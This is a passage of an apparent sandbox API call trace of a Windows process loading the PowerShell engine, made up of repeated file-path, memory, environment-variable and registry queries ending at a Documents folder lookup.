lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.073] GetLastError () returned 0xcb [0142.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.073] GetLastError () returned 0xcb [0142.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.073] GetLastError () returned 0xcb [0142.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.073] GetLastError () returned 0xcb [0142.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.073] GetLastError () returned 0xcb [0142.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.073] GetLastError () returned 0xcb [0142.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.074] GetLastError () returned 0xcb [0142.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.074] GetLastError () returned 0xcb [0142.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d664, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.074] GetLastError () returned 0xcb [0142.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d664, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.074] GetLastError () returned 0xcb [0142.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d664, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.074] GetLastError () returned 0xcb [0142.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.087] GetLastError () returned 0xcb [0142.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d664, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.087] GetLastError () returned 0xcb [0142.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d664, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.087] GetLastError () returned 0xcb [0142.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.087] GetLastError () returned 0xcb [0142.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d664, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.087] GetLastError () returned 0xcb [0142.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d664, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.087] GetLastError () returned 0xcb [0142.087] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.088] GetLastError () returned 0xcb [0142.093] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.111] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.111] GetLastError () returned 0xcb [0142.112] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.112] GetLastError () returned 0xcb [0142.114] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.114] GetLastError () returned 0xcb [0142.119] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.119] GetLastError () returned 0xcb [0142.123] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.123] GetLastError () returned 0xcb [0142.132] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.133] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.196] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.206] GetLastError () returned 0xcb [0142.553] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x2e5670 [0142.554] GetLastError () returned 0x0 [0142.555] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x2e56f8 [0142.555] GetLastError () returned 0x0 [0142.714] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.743] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.744] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.744] VirtualQuery (in: lpAddress=0x25c294, lpBuffer=0x25d294, dwLength=0x1c | out: lpBuffer=0x25d294*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.776] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.776] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.776] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.776] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.776] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.776] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.776] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.776] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.776] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.776] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.776] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.777] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.777] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.777] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.777] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.777] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.777] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.777] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.777] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.777] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.777] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.777] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.777] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.777] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.777] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.777] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.777] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.777] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.777] VirtualQuery (in: lpAddress=0x25cbe0, lpBuffer=0x25dbe0, dwLength=0x1c | out: lpBuffer=0x25dbe0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.788] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.788] GetLastError () returned 0xcb [0142.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d9dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.804] GetLastError () returned 0xcb [0142.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d98c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.804] GetLastError () returned 0xcb [0142.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d98c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.804] GetLastError () returned 0xcb [0142.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d98c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.804] GetLastError () returned 0xcb [0142.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d9dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.830] GetLastError () returned 0xcb [0142.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d98c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.830] GetLastError () returned 0xcb [0142.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d98c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.830] GetLastError () returned 0xcb [0142.830] VirtualQuery (in: lpAddress=0x25cf08, lpBuffer=0x25df08, dwLength=0x1c | out: lpBuffer=0x25df08*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d9dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.831] GetLastError () returned 0xcb [0142.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d98c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.831] GetLastError () returned 0xcb [0142.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d98c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.831] GetLastError () returned 0xcb [0142.831] VirtualQuery (in: lpAddress=0x25cf00, lpBuffer=0x25df00, dwLength=0x1c | out: lpBuffer=0x25df00*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.831] VirtualQuery (in: lpAddress=0x25cbb4, lpBuffer=0x25dbb4, dwLength=0x1c | out: lpBuffer=0x25dbb4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.831] VirtualQuery (in: lpAddress=0x25cbb4, lpBuffer=0x25dbb4, dwLength=0x1c | out: lpBuffer=0x25dbb4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.833] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e63c | out: phkResult=0x25e63c*=0x3a8) returned 0x0 [0142.834] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e684, lpData=0x0, lpcbData=0x25e680*=0x0 | out: lpType=0x25e684*=0x1, lpData=0x0, lpcbData=0x25e680*=0x56) returned 0x0 [0142.834] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e684, lpData=0x2e48d0, lpcbData=0x25e680*=0x56 | out: lpType=0x25e684*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e680*=0x56) returned 0x0 [0142.834] RegCloseKey (hKey=0x3a8) returned 0x0 [0142.834] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e63c | out: phkResult=0x25e63c*=0x3a8) returned 0x0 [0142.834] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e684, lpData=0x0, lpcbData=0x25e680*=0x0 | out: lpType=0x25e684*=0x1, lpData=0x0, lpcbData=0x25e680*=0x56) returned 0x0 [0142.834] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e684, lpData=0x2e48d0, lpcbData=0x25e680*=0x56 | out: lpType=0x25e684*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e680*=0x56) returned 0x0 [0142.834] RegCloseKey (hKey=0x3a8) returned 0x0 [0142.836] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2e48d0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0142.836] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x25e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0142.836] GetLastError () returned 0x3f0 [0142.836] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2e48d0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 